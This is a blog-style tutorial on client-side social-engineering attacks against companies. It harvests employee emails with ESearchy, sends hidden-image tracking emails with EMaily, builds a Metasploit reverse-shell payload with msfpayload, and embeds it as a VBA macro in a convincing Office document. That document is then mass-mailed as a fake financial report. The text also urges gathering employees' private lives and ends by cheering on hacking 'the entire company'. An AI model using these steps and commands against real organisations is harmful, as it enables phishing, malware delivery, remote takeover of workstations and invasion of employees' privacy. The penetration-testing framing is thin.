FreedomCoder
General Information
…”our employees are responsable and security aware”….
…”They have admin access, because we trust them “….
….”I thought it was safe to open that file. Robert from IT sent it to me” …
….etc…
Nowadays, computers networks, are “”"”usually”"”" secure. Finding an exploitable remote network vulnerability is getting more and more difficult. This is due to several reasons, such as operating system are safer, patching is slowly becoming a must for all production applications, etc.
But, what about the corporate networks ? Do companies secure their networks the same way they do production servers? The answer is NO. For thousands of motives, workstations are never kept up-to-date, nor properly setup. In top of that, we have the end-users ( including IT admins), an amazing set of people that do amazing tasks, such as manage to infect their computer in less than two days, install all those crazy apps, and/or open all those links that have explicit DO NOT OPEN VIRUS FOUND.
Anyways, to make a story short, hackers, spammers, botnets, and all the “bad” guys are constnatly taken advantage of the ancient weakest link in all type of security; “The human factor“. It does not matter how much you harden a computer, you can count on human ingenuity – …or should I say stupidity… — to find an unthinkable way to open and compromise their workstation.
In addition, nowadays, everybody wants to check their Facebook, LinkedIn, email, twitter, GMail. Basically, it is human nature to be inform ( … gossip ). Attackers know this and they count on people curiosity and need of information to craft their these types of attacks.
Client-side attacks, AKA social enginerring attacks, social engineering penetration tests, basically the not so-new remote exploit trend.
It is worth noting that these type of attacks have existed for a long time, but now due to the tightness of security in networking on one hand and the expansion and rapid grow of social networks on the other hand; it has gained a lot of strength and new types of attacks are appearing daily.
Types of attacks:
- emails
- websites
- Social networks ( Facebook, Orkut, twitter, Linkedin, … )
- Forums
- Physical ( pendrive, CD, phone, cellphones, ipods, ipads, etc )
Enough of the BS talk let get dirty and talk about how to actually perform a client-side attack.
Info gathering Phase ( Reconnaissance )
Like in any other type of penetration test, we need to gather information. The only difference here is that instead of looking for operating system and software versions and vulnerabilities we need to search information about the company, their employees, their social networks, etc.
I guess that when we are performing a test we would have some limitations with regards to privacy and employess private life, but the true is that a real attacks won’t have such limitations. So the simple rule is the more information you have the better. Everything is relevant information. Everything from sample company documents all they way down to what place some employee went to dinner last week and with whom.
Luckily for us, Mark Zuckerberg ( creator of Facebook ) has made our life much easier convincing people they are supposed to forget abour privacy and share as much information as they can with as much people as they can.
Depending on the type of attack we are performing, the type of data we will need, but most surely we will be needing plenty of email accounts from the company being assess. There are many tools capable of performing OSINT ( Open Source Intelligence) theHarverster, Paterva’s Maltego, et and of course ESearchy.
Esearchy is a small ruby library capable of searching the internet for email addresses and persons. Currently, the supported searching engines are, but not limited to:
- Search engines:
- Bing
- Yahoo,
- AltaVista
- Social Engines:
- Google Profiles
- Naymz
- Classmantes
- Spoke
- Other Engines
- PGP servers
- Usenets
- GoogleGroups Search
- Spider
- LDAP
In addition to that, ESearchy downloads several types of files and searches their contents for emails.
File types supported, but not limited to:
- DOC
- DOCX
- XLSX
- PPTX
- ODT
- ODP
- ODS
- ODB
- ASN
- TXT
Installation:
$> sudo gem sources -a http://gems.github.com
$> sudo gem install gemcutter
$> sudo gem install esearchy
If you are installing it in backtrack follow the following how-to “Installing ESearchy on Backtrack 4.0”
The application supports several types of searches using the esearchy command and or you can create custom scripts using the esearchy library. Using the tool is simple, for example:
$> esearchy -q @company.com –enable-gmail –enable-gpg
$> esearchy -q @company.com -c “Company Inc” –enable-people –profiling
After this we need to find information about the DNS servers, the mail servers and any other information that we usually do get as part of any penetration test. A good tip, is to check the SMTP server for vulnerabilities such as information disclosures using VRFY, EXPN, etc …
Software and Physical network
Once we have a target list ( emails, names, etc .. ), We need to start performing an assessment on the network from within. One possible way of doing this is by sending one or more rounds of emails using specially crafted html templated emails consisting of several image tags pointing to different ports. and here is when a tool such as EMaily comes in.
Emaily is a command line tool created to send multiple templated emails using several servers at the same time. It contains many templates, but users can create their own templates and populate them as needed. It is worth noting that EMaily is also an expandable ruby library.
<img src="http://site:80/80.jpg?e=test@test.com style="display:none" />
<img src="http://site:8080/8080.jpg?e=test@test.com style=" display:none" />
<img src="http://site:443/443.jpg?e=test@test.com style="display:none" />
<img src="http://site:1080/1080.jpg?e=test@test.com style=" display:none" />
<img src="http://site:139/139.jpg?e=test@test.com style=" display:none" />
<img src="http://site:445/445.jpg?e=test@test.com style=" display:none" />
This can be automatically generated using EMaily template system as it is shown on the following code snipet, by simply using the %%payload[port 1, ... ,port n]%%
As we can see from the output generated by EMaily this will test egressing rules, obtain information such as operating system, email client used, IP addresses, etc…
Penetration Phase
Once we have obtained enough information about the company’s users and network infrastructure, it is time to concentrate all our efforts in attacking the company using all possible methods. There are many types of ways to compromise an end user. The most common methods are sending emails with certain types of attachments, such as pdf, Word, Excel, PowerPoint, executables, etc. Pretty much anything is possible and allowed.
VBA Attacks
One of the most commons methods to compromise a workstation is through a VBA payload. This is achieved using a word, excel or powerpoint file that contains a malicious script that will generate and execute, most commonly, a reverse shell. ( metasploit, Core Impact, custom built )
It is worth noting that when generating the payload we should use the open port information we got from our information gathering phase, so we are sure we can connect back to our MSF instance.
Sample Metasploit command to generate a reverse tcp vnc inject payload.
> msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.1 V > vbvnc.bas
Once we have the payload we need to add it to a file. Here is where the experience, artist skills come in handy. The more credible the file the higher the chances for an employee to open the document. Usually, it is recommended to search in google, bing, yahoo for documents made or related to the company in question. This docs, should contain information such as logos, speeches and other corporate standards, that will make the attack more credible.
First open the document in question and open the Visual Editor for macros.
After that copy the content of the first part of the .bas script into the editor, save and quit the macro.
The second part “the actual payload” should be stored in the end of the document, if we are using a MS Word document.
It is worth noting, that if we use the latest version of the MSF VBA attack (3.4.x ) we will only be able to use it in Microsoft Word, but with a couple changes, we should be able to add it to Excel as well. Instead of using the payload as paragraphs we can paste then into the macro. Adding as a stream ( as it used to be done ) and or by using chr() method.
…
s = s + chr(38) + chr(72) + chr(53) + chr(65)
s = s + chr(38) + chr(72) + chr(57) + chr(48)
s = s + chr(38) + chr(72) + chr(48) + chr(48)
s = s + chr(38) + chr(72) + chr(48) + chr(51)
s = s + chr(72) + chr(38 + chr(48) + chr(48)
s = s + chr(38)
Once we have this setup Excel setup, it is time to use all the available emails and launch our first round of client-side attacks using EMaily again but this time we should use another template such as an internal email or something that would convince users to open the attached Excel sheet ( I leave that for later .. ).
For example if we want to send emails using servers 1,2,3,4 in blocks of 100 emails and we want to do it all at the same time ( Threaded) with a small scanports that would allow us to know who opened the email, we would have to execute the following command.
> emaily -S server1,server2,server4,server4 -b 100 -T --subject "Quaterly Report" -t templates/q_report.html -l ~/company_emails.csv -a ~/tmp/Q4_Financial_Report.xls --webserver --scanports 80,443
Well, now is time layback, get some mate with alfajores and wait until users start executing the excel payload and we get connection back. After that sky is the limit …. HACK the entire company ….
Happy Hacking !!!!
If you enjoyed this article, please consider sharing it!
